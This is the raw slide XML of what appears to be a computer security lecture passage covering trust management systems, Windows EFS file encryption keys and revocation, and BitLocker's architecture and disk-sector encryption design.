            </a:r>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69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138244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Trust Management Systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1219200"/>
            <a:ext cx="4572000" cy="5334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>trust management system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>typically has rules describing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Actions: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>operations with security-related consequences on the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Principals: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>users, processes, or other entities that can perform actions on the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Policies: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>precisely written rules that govern which principals are authorized to perform which actions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Credentials: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>digitally signed documents that bind principal identities to allowable actions, including the authority to allow principals to delegate authority to other principals.</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7</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95800" y="2209800"/>
            <a:ext cx="4507964"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EFS Keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="5486400" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Users have public-private key pairs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Each file is encrypted with a different symmetric file encryption key (FEK)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>FEK is encrypted with public key of file owner and other authorized users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Data Decryption Fields (DDF) stored in file header (metadata)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>ID of authorized user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>FEK encrypted with public key of user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Data Recovery Fields (DRFs) provide additional encrypted FEKs, associated with recovery agents</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94759074-FD2C-4344-8997-BA6EDF992768}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6172200" y="1066800"/>
            <a:ext cx="2133600" cy="914400"/>
            <a:chOff x="6172200" y="1066800"/>
            <a:chExt cx="2133600" cy="914400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6172200" y="1066800"/>
              <a:ext cx="2133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6248400" y="1524000"/>
              <a:ext cx="1981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t>E</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" baseline="-25000" smtClean="0"/>
                <a:t>PK1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" smtClean="0"/>
                <a:t>(FEK)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6248400" y="1143000"/>
              <a:ext cx="1981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ID1</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6172200" y="1981200"/>
            <a:ext cx="2133600" cy="914400"/>
            <a:chOff x="6172200" y="1066800"/>
            <a:chExt cx="2133600" cy="914400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Rectangle 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6172200" y="1066800"/>
              <a:ext cx="2133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6248400" y="1524000"/>
              <a:ext cx="1981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t>E</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" baseline="-25000" smtClean="0"/>
                <a:t>PK2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" smtClean="0"/>
                <a:t>(FEK)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6248400" y="1143000"/>
              <a:ext cx="1981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ID2</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6172200" y="2895600"/>
            <a:ext cx="2133600" cy="914400"/>
            <a:chOff x="6172200" y="1066800"/>
            <a:chExt cx="2133600" cy="914400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6172200" y="1066800"/>
              <a:ext cx="2133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ectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6248400" y="1524000"/>
              <a:ext cx="1981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mtClean="0"/>
                <a:t>E</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" baseline="-25000" smtClean="0"/>
                <a:t>PK3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" smtClean="0"/>
                <a:t>(FEK)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6248400" y="1143000"/>
              <a:ext cx="19812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ID3</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="3810000"/>
            <a:ext cx="2133600" cy="2590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E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" smtClean="0"/>
              <a:t>FEK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(file contents)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34291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EFS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Initial encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>File encrypted when created or EFS initialized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>DDF of file owner created and added to file header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Adding new authorized user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>DDF of new user created and added to file header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Any authorized user can add other users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Removing authorized user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>DDF of revoked user removed from file header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>File should be re-encrypted with new FEK, but is not …</a:t>
            </a:r>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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23848588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BitLocker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Targets lost-laptop scenario</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Encrypts NTFS volumes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>All disk sectors encrypted with symmetric encryption method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Key can be provided by user at boot time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Passphrase</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Hardware token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Key can be stored in special cryptographic chip that releases it after checking the integrity of the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Trusted Platform Module (TPM)</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72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32667826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BitLocker Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="6096000" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Volumes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Small unencrypted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>boot volume</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Large </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encrypted volume</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> storing rest of OS and user files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Volume Master Key (VMK)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Unlocked through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authentication procedure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Full Volume </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>ncryption Key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Used to encrypt sectors of encrypted volume</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>tored on boot volume encrypted with VMK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Kept in memory and never written unencrypted to disk</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73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7010400" y="2819400"/>
            <a:ext cx="1752600" cy="2895600"/>
            <a:chOff x="7010400" y="3124200"/>
            <a:chExt cx="1752600" cy="2133600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Flowchart: Magnetic Disk 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7010400" y="3124200"/>
              <a:ext cx="1752600" cy="533400"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartMagneticDisk">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Flowchart: Magnetic Disk 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7010400" y="3429000"/>
              <a:ext cx="1752600" cy="533400"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartMagneticDisk">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Magnetic Disk 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7010400" y="3733800"/>
              <a:ext cx="1752600" cy="533400"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartMagneticDisk">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Flowchart: Magnetic Disk 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7010400" y="4038600"/>
              <a:ext cx="1752600" cy="533400"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartMagneticDisk">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Flowchart: Magnetic Disk 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7010400" y="4648200"/>
              <a:ext cx="1752600" cy="533400"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartMagneticDisk">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Flowchart: Magnetic Disk 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7010400" y="4038600"/>
              <a:ext cx="1752600" cy="1219200"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartMagneticDisk">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mtClean="0"/>
                <a:t>Encrypted Volume</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Flowchart: Magnetic Disk 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010400" y="2514600"/>
            <a:ext cx="1752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Boot Volume</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="421724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Startup and Operation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Authentication procedure checks integrity of system and unseals VMK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>VMK used to decrypt FVEK, which is kept in main memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>For each disk sector accessed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Decrypt on read</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Encrypt on write</a:t>
            </a:r>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74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3899381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Encrypting Disk Sectors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Each sector encrypted independently</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Cannot create inter-sector dependencies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Speed is essential</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Encryption and decryption at same or better rate than disk I/O peak rate in a standard laptop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Integrity checking not used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Sector sizes are powers of two (512B through 8,192B)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Adding a MAC would double space usage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Block ciphers are vulnerable to bit-flipping attacks in all known symmetric encryption modes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Plaintext of OS and applications code is predictable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Cryptographic design principles [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Ferguson, 2006</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Encryption as poor man’s authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Preprocessing of each block to achieve diffusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>AES in CBC mode with sector-dependent IV</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
